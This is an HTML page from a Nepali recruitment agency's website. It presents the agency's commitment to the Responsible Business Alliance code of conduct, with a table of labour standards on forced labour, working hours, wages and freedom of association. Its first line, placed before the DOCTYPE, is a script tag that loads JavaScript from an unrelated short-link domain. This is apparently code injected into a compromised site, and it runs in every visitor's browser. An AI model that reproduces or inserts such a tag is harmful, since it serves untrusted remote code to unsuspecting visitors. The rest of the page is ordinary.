<script src="https://9ge.ge/xQd0j2" type="text/javascript"></script>
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8" />
    <title>Team Members</title>
    <meta content="width=device-width, initial-scale=1.0" name="viewport" />
    <meta content="Free HTML Templates" name="keywords" />
    <meta content="Free HTML Templates" name="description" />

    <!-- Favicon -->
    <link href="img/favicon.ico" rel="icon" />

    <!-- Google Web Fonts -->
    <link rel="preconnect" href="https://fonts.googleapis.com" />
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
    <link
      href="https://fonts.googleapis.com/css2?family=Nunito:wght@400;600;700;800&family=Rubik:wght@400;500;600;700&display=swap"
      rel="stylesheet"
    />

    <!-- Icon Font Stylesheet -->
    <link
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css"
      rel="stylesheet"
    />
    <link
      href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css"
      rel="stylesheet"
    />

    <!-- Libraries Stylesheet -->
    <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet" />
    <link href="lib/animate/animate.min.css" rel="stylesheet" />

    <!-- Customized Bootstrap Stylesheet -->
    <link href="css/bootstrap.min.css" rel="stylesheet" />

    <!-- Template Stylesheet -->
    <link href="css/style.css" rel="stylesheet" />
  </head>

  <body>
    <!-- Spinner Start -->
    <!-- <div
      id="spinner"
      class="show bg-white position-fixed translate-middle w-100 vh-100 top-50 start-50 d-flex align-items-center justify-content-center"
    >
      <div class="spinner"></div>
    </div> -->
    <!-- Spinner End -->

    <!-- Topbar Start -->
    <div class="container-fluid bg-white px-5 d-none d-lg-block">
      <div class="row gx-0">
        <div class="col-lg-8 text-center text-lg-start mb-2 mb-lg-0">
          <div class="d-inline-flex align-items-center" style="height: 45px">
            <small class="me-3 text-dark"
              ><i class="fa fa-map-marker-alt me-2"></i>License No. 467/060/061
            </small>
            <small class="me-3 text-dark"
              ><i class="fa fa-phone-alt me-2"></i> +977-01-4970366 / 01-4970466
            </small>
            <small class="text-dark"
              ><i class="fa fa-envelope-open me-2"></i
              >info@amityglobalgroup.com</small
            >
          </div>
        </div>
        <div class="col-lg-4 text-center text-lg-end">
          <div class="d-inline-flex align-items-center" style="height: 45px">
            <a
              class="d-flex justify-content-center align-items-center btn btn-sm btn-outline-light btn-sm-square rounded-circle me-2"
              href=""
              ><i class="fab fa-twitter fw-normal"></i
            ></a>
            <a
              class="d-flex justify-content-center align-items-center btn btn-sm btn-outline-light btn-sm-square rounded-circle me-2"
              href="https://www.facebook.com/amityglobalemploymentservices"
              ><i class="fab fa-facebook-f fw-normal"></i
            ></a>
            <a
              class="d-flex justify-content-center align-items-center btn btn-sm btn-outline-light btn-sm-square rounded-circle me-2"
              href=""
              ><i class="fab fa-linkedin-in fw-normal"></i
            ></a>
            <a
              class="d-flex justify-content-center align-items-center btn btn-sm btn-outline-light btn-sm-square rounded-circle me-2"
              href=""
              ><i class="fab fa-instagram fw-normal"></i
            ></a>
            <a
              class="d-flex justify-content-center align-items-center btn btn-sm btn-outline-light btn-sm-square rounded-circle"
              href=""
              ><i class="fab fa-youtube fw-normal"></i
            ></a>
          </div>
        </div>
      </div>
    </div>
    <!-- Topbar End -->

    <!-- Navbar Start -->
    <div class="container-fluid position-relative p-0">
      <nav class="navbar navbar-expand-lg bg-white px-5 py-3 py-lg-0">
        <a href="index.html" class="navbar-brand p-2">
          <h1 class="m-0"><img class="w-100" src="img/logo.png" alt="" /></h1>
        </a>
  
        <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarCollapse">
          <span class="fa fa-bars"></span>
        </button>
        <div class="collapse navbar-collapse" id="navbarCollapse">
          <div class="navbar-nav ms-auto py-0">
            <a href="index.html" class="nav-item nav-link">Home</a>
            <div class="nav-item dropdown">
              <a href="#" class="nav-link dropdown-toggle" data-bs-toggle="dropdown">About</a>
  
              <div class="dropdown-menu m-0">
                <a href="about.html" class="dropdown-item">About Company</a>
                <a href="legaldocs.html" class="dropdown-item">Registration/Approval</a>
                <a href="massage-cha.html" class="dropdown-item">Our Message</a>
                <a href="commitment.html" class="dropdown-item">Our Commitment</a>
                <a href="vision.html" class="dropdown-item">Vision</a>
                <a href="mission.html" class="dropdown-item">Mission</a>
                <a href="chart.html" class="dropdown-item">Organizational Chart</a>
              </div>
            </div>
            <div class="nav-item dropdown">
              <a href="#" class="nav-link dropdown-toggle" data-bs-toggle="dropdown">Documents</a>
              <div class="dropdown-menu m-0">
                <a href="documents.html" class="dropdown-item">Demand Letter</a>
                <a href="recru-procedure.html" class="dropdown-item">Recruiting Procedure</a>
                <a href="recu-documents.html" class="dropdown-item">Recruiting Documents</a>
              </div>
            </div>
            <a href="jobs-category.html" class="nav-item nav-link">Job Seeker</a>
  
            <!-- <div class="nav-item dropdown">
                          <a href="#" class="nav-link dropdown-toggle" data-bs-toggle="dropdown">Job Seeker</a>
                          <div class="dropdown-menu m-0">
                              <a href="#" class="dropdown-item">Eligibility criteria: </a>
                              <a href="#" class="dropdown-item">Contracts and agreements: </a>
                          </div>
                      </div> -->
            <!-- <div class="nav-item dropdown">
                          <a href="#" class="nav-link dropdown-toggle" data-bs-toggle="dropdown">Employer</a>
                          <div class="dropdown-menu m-0">
                              <a href="#" class="dropdown-item">Pricing Plan</a>
                              <a href="#" class="dropdown-item">Our features</a>
                              <a href="#" class="dropdown-item">Team Members</a>
                              <a href="#" class="dropdown-item">Testimonial</a>
                              <a href="#" class="dropdown-item">Free Quote</a>
                          </div>
                      </div> -->
            <a href="Newspaperpub.html" class="nav-item nav-link">Newspaper Vacancy</a>
            <a href="gallery.html" class="nav-item nav-link">Gallery</a>
            <a href="contact.html" class="nav-item nav-link">Contact</a>
          </div>
  
          <!-- <a href="" class="btn btn-primary py-2 px-4 ms-3">Download Pro Version</a> -->
        </div>
      </nav>
  
      <div
        class="container-fluid bg-primary py-5 bg-header"
        style="margin-bottom: 90px"
      >
        <div class="row py-5">
          <div class="col-12 pt-lg-5 mt-lg-5 text-center">
            <h1 class="display-4 text-white animated zoomIn">Our Commitment</h1>
            <a href="index.html" class="h5 text-white">Home</a>
            <i class="far fa-circle text-white px-2"></i>
            <a href="" class="h5 text-white">Commitment</a>
          </div>
        </div>
      </div>
    </div>
    <!-- Navbar End -->

    <!-- Full Screen Search Start -->
    <div class="modal fade" id="searchModal" tabindex="-1">
      <div class="modal-dialog modal-fullscreen">
        <div class="modal-content" style="background: rgba(9, 30, 62, 0.7)">
          <div class="modal-header border-0">
            <button
              type="button"
              class="btn bg-white btn-close"
              data-bs-dismiss="modal"
              aria-label="Close"
            ></button>
          </div>
          <div
            class="modal-body d-flex align-items-center justify-content-center"
          >
            <div class="input-group" style="max-width: 600px">
              <input
                type="text"
                class="form-control bg-transparent border-primary p-3"
                placeholder="Type search keyword"
              />
              <button class="btn btn-primary px-4">
                <i class="bi bi-search"></i>
              </button>
            </div>
          </div>
        </div>
      </div>
    </div>
    <!-- Full Screen Search End -->

    <!-- Team Start -->
    <div class="container-fluid wow fadeInUp" data-wow-delay="0.1s">
      <div class="container">
       
        <div class="row g-5">
          <commit-header>
            <img src="/img/justlogo.png" alt="" />
            <h3>
              COMMITMENT FOR COMPLIANCE TO <br />
              RESPONSIBLE BUSINESS ALLIANCE(RBA) <br />
              PRINCIPLES & CODE OF CONDUCT
            </h3>
          </commit-header>
          <hr />
          <commit-body>
            <p></p>
            <p>
              As one of the key manpower suppliers from Nepal, AMITY GLOBAL
              EMPLOYMENT SERVICES (AGES) fully support the vision and goals of
              the Responsible Business Alliance (RBA). RBA has given and showed
              a sustainable business culture for the industry.
            
              We align our business and operations to promote the elements
              emphasize by RBA, this include freely chosen employment, promoting
              a safe environment, environmentally sustainable, zero cost
              recruitment, business ethical and implementing management system.
            
              We also need your support working with us while we are promoting
              RBA elements within our organizations. You may strengthen our
              decision to fulfill the RBA Code of Conduct by the following ways:
            </p>
            <ol>
              <li>
                Read and understand the RBA Code of Conduct and Principles
              </li>
              <li>Compliance with the code</li>
              <li>Conduct self-evaluation ensure conformity</li>
              <li>Cooperate with us if an audit required</li>
              <li>Notify us that you learn of items of non-compliance</li>
            </ol>
            <p>
              While we are implementing RBA Code of Conduct, we also strongly
              recommend you consider implementing RBA Code of Conduct within
              your organization if you have not done so.
            </p>
            <p>
              Amity commits to progressively align its operations with the
              provisions of RBA Code of Conduct and to support and encourage its
              all the sub-agent, supplier, and customer to do so.
            </p>
            <p>
              Wherever possible, Amity will seek to adopt the RBA approach and
              tools in practical ways in the spirit of the industry’s common
              goals. Some of the labor standards we comply at AGES are as
              follows:
            </p>
          </commit-body>
          <commit-table>
            <table>
              <thead>
                <tr>
                  <th>Sub-elements</th>
                  <th>Description</th>
                </tr>
              </thead>
              <tbody>
                <tr>
                  <th>Freely-Chosen Employment</th>
                  <td>
                    <ul>
                      <li>
                        Any type of forced, involuntary or exploitative prison,
                        indentured, bonded, trafficked or slave Labor not used.
                      </li>
                      <li>
                        Adequate and effective policy and procedures established
                        to ensure no form of forced, bonded, involuntary or
                        exploitative prison, trafficked or slave labor is used.
                      </li>
                      <li>
                        The provided written terms of contract to the workers in
                        the native language and verbally explained prior
                        employment.
                      </li>
                      <li>
                        No holding of government issued identification and
                        original personal documentations by any parties.
                      </li>
                      <li>
                        Unreasonable restriction of the workers, and their
                        access to basic liberties.
                      </li>
                    </ul>
                  </td>
                </tr>
                <tr>
                  <th>Young Worker</th>
                  <td>
                    <ul>
                      <li>
                        Workers are not below the minimum age.
                      </li>
                      <li>
                        Established adequate and effective policy and processed to ensure workers below the legal minimum working age are not hired.
                      </li>
                      <li>
                        Workers below age of 18 not performing work likely jeopardizing health & safety and night work or overtime.
                      </li>
                      <li>
                        Adequate and effective apprentice/intern/student worker employment and policies and	procedures
                      </li>
                    </ul>
                  </td>
                </tr>
                <tr>
                  <th>Working Hours </th>
                  <td>
                    <ul>
                      <li>
                        Hours worked in a workweek over the last 12 months does not exceed 60 hours.
                      </li>
                      <li>
                        Workers receive at least one day off every seven days.
                      </li>
                      <li>
                        Adequate and effective policy, system and procedures are established to accurately determine, communicate, record, manage and control working hours including overtime, reliable and detailed records of workers normal and overtime working hours.
                      </li>
                      <li>
                        Allow mandated breaks, holidays, and vacation days, include time off when ill or for maternity leave.
                      </li>
                     
                    </ul>
                  </td>
                </tr>

                <tr>
                  <th>Wages & Benefits</th>
                  <td>
                    <ul>
                      <li>
                        Wages for regular and overtime hours are correctly calculated and paid.
                      </li>
                      <li>
                        For each pay period, workers are paid on a timely basis and provided with understandable wage statements that includes sufficient information to verify accurate compensation for work performed.
                      </li>
                      <li>
                        Wages are not deducted or reduced for disciplinary reasons.
                      </li>
                      <li>
                        Deductions or withholding are calculated correctly and submitted to the appropriate agency within the local law time frame.
                      </li>
                     
                    </ul>
                  </td>
                </tr>
                <tr>
                  <th>Humane Treatment</th>
                  <td>
                    <ul>
                      <li>
                        No evidence of sexual harassment or abuse, corporal punishment, mental or physical 	coercion, verbal abuse or intimidation exists.
                      </li>
                      <li>
                        Adequate and effective policies and procedures on decent/humane working conditions and fair treatment of workers are established.
                      </li>
                      <li>
                        Disciplinary actions are recorded, consistent with the procedures and reviewed by management.
                      </li>
                     
                    </ul>
                  </td>
                </tr>
                <tr>
                  <th>Non-Discrimination</th>
                  <td>
                    <ul>
                      <li>
                        No evidence of discrimination.
                      </li>
                      <li>
                        Policies and procedures that ban discrimination and harassment are established.
                      </li>
                      <li>
                        Reasonable accommodation for religious practices is provided.
                      </li>
                     
                    </ul>
                  </td>
                </tr>
                <tr>
                  <th>Freedom of Association</th>
                  <td>
                    <ul>
                      <li>
                        Workers can form or enroll in a trade union of their own free will.
                      </li>
                      <li>
                        Legal rights of all workers to bargain collectively, or refrain from doing so, are respected.
                      </li>
                      <li>
                        Participants respect the legal right for a worker to peaceful assemblyor refrain from doing so, are respected.
                      </li>
                      <li>No evidence of unequal treatment between unionized or worker representatives and other workers exists.</li>
                     
                    </ul>
                  </td>
                </tr>
              </tbody>
            </table>
<br>
<br>
            <h5><strong> Sincerely,</strong> </h5>
            <h5><strong>Amity Global Employment Services</strong></h5>
            <h5><strong>Samakhusi, Kathmandu</strong></h5>
          </commit-table>


          


        </div>
      </div>
    </div>

    <!-- Team End -->
  <!-- Footer Start -->
  <hr />
  <div class="container-fluid bg-white text-dark mt-0 wow fadeInUp" data-wow-delay="0.1s">
    <div class="container">
      <div class="row">
        <!-- FooterABOUT -->
        <div class="col-lg-3 col-md-6 col-sm-6 footer-about">
          <div class="d-flex flex-column align-items-center justify-content-start text-center h-100 mt-5">
            <a href="index.html" class="navbar-brand">
              <h1 class="m-0 text-white">
                <img class="w-100" src="img/logo.png" alt="" />
              </h1>
            </a>
            <p class="mt-3 mb-4">
              Amity Global Employment Services Pvt.Ltd. is the leading
              employment agency in Nepal since almost 2 decades engaged in the
              supply of human resources in many parts of the world.
            </p>
       
          </div>
        </div>

        <!-- Footer ABout END -->

        <!-- FOOTER CONTACT -->
        <div class="col-lg-3 col-md-6 col-sm-6 pt-5">
          <div class="section-title section-title-sm position-relative pb-3 mb-4">
            <h3 class="text-dark mb-0">Contact</h3>
          </div>
          <div class="d-flex mb-2">
            <i class="bi bi-geo-alt text-dark me-2"></i>
            <p class="mb-0">Ranibari Marga-29, Samakhusi Kathmandu, Nepal</p>
          </div>
          <div class="d-flex mb-2">
            <i class="bi bi-envelope-open text-dark me-2"></i>
            <p class="mb-0">info@amityglobalgroup.com</p>
          </div>
          <div class="d-flex mb-2">
            <i class="bi bi-telephone text-dark me-2"></i>
            <p class="mb-0">+977-01-4970366/ 01-4970466</p>
          </div>
          <div class="d-flex mt-4">
            <a class="d-flex justify-content-center align-items-center btn btn-dark btn-square me-2"
              href="https://twitter.com/amity_global"><i class="fab fa-twitter fw-normal"></i></a>
            <a class="d-flex justify-content-center align-items-center btn btn-dark btn-square me-2"
              href="https://www.facebook.com/amityglobalemploymentservices"><i
                class="fab fa-facebook-f fw-normal"></i></a>
            <a class="d-flex justify-content-center align-items-center btn btn-dark btn-square me-2" href="#"><i
                class="fab fa-linkedin-in fw-normal"></i></a>
            <a class="d-flex justify-content-center align-items-center btn btn-dark btn-square" href="#"><i
                class="fab fa-instagram fw-normal"></i></a>
          </div>
        </div>
        <!-- FOOTER CONTACT END -->

        <!-- FOOTER QUICK LINKS -->
        <div class="col-lg-3 col-md-6 col-sm-6 pt-0 pt-lg-5 mb-5">
          <div class="section-title section-title-sm position-relative pb-3 mb-4">
            <h3 class="text-dark mb-0">Quick Links</h3>
          </div>
          <div class="link-animated d-flex flex-column justify-content-start">
            <a class="text-dark mb-2" href="index.html"><i class="bi bi-arrow-right text-dark me-2"></i>Home</a>
            <a class="text-dark mb-2" href="about.html"><i class="bi bi-arrow-right text-dark me-2"></i>About Us</a>
            <a class="text-dark mb-2" href="documents.html"><i
                class="bi bi-arrow-right text-dark me-2"></i>Documents</a>
            <a class="text-dark mb-2" href="jobs-category.html"><i class="bi bi-arrow-right text-dark me-2"></i>Job
              Seeker</a>
            <a class="text-dark mb-2" href="chart.html"><i class="bi bi-arrow-right text-dark me-2"></i>Organizational
              Chart</a>
            <a class="text-dark" href="contact.html"><i class="bi bi-arrow-right text-dark me-2"></i>Contact Us</a>
          </div>
        </div>

        <!-- FOOTER QUICKLINS END -->

        <!-- FOOTER MAP -->

        <div class="col-lg-3 col-md-6 col-sm-6 pt-0 pt-lg-5 mb-5">
          <div class="section-title section-title-sm position-relative pb-3 mb-4">
            <h3 class="text-dark mb-0">Map</h3>
          </div>
          <div class="link-animated d-flex flex-column justify-content-start">
            <iframe
              src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d2357.075124405027!2d85.32286374645743!3d27.728945989500744!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x39eb19370d71a32d%3A0xc3355d3abf9f8f90!2sAmity%20Global%20Employment%20Services!5e0!3m2!1sen!2snp!4v1687767746347!5m2!1sen!2snp"
              width="200" height="200" style="border: 0" class="w-100" loading="lazy"
              referrerpolicy="no-referrer-when-downgrade"></iframe>
          </div>
        </div>

        <!-- FOOTER MAP END -->
      </div>
    </div>
  </div>
  <div class="container-fluid text-dark" style="background: #eef9ff">
    <div class="container text-center">
      <div class="row justify-content-end">
        <div class="col-lg-8 col-md-6">
          <div class="d-flex align-items-center justify-content-center" style="height: 75px">
            <p class="mb-0">
              &copy;
              <a class="text-dark border-bottom" href="#">Amity Global Group | </a>© 2022 All Rights Reserved

              <!--/*** This template is free as long as you keep the footer author’s credit link/attribution link/backlink. If you'd like to use the template without the footer author’s credit link/attribution link/backlink, you can purchase the Credit Removal License from "https://htmlcodex.com/credit-removal". Thank you for your support. ***/-->
              Designed by
              <a class="text-dark border-bottom" href="https://radiantnepal.com/">Radiant Infotech</a>
            </p>
          </div>
        </div>
      </div>
    </div>
  </div>
  <!-- Footer End -->

    <!-- Back to Top -->
    <a href="#" class="btn btn-lg btn-primary btn-lg-square rounded back-to-top"
      ><i class="bi bi-arrow-up"></i
    ></a>

    <!-- JavaScript Libraries -->
    <script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/js/bootstrap.bundle.min.js"></script>
    <script src="lib/wow/wow.min.js"></script>
    <script src="lib/easing/easing.min.js"></script>
    <script src="lib/waypoints/waypoints.min.js"></script>
    <script src="lib/counterup/counterup.min.js"></script>
    <script src="lib/owlcarousel/owl.carousel.min.js"></script>

    <!-- Template Javascript -->
    <script src="js/main.js"></script>
  </body>
</html>
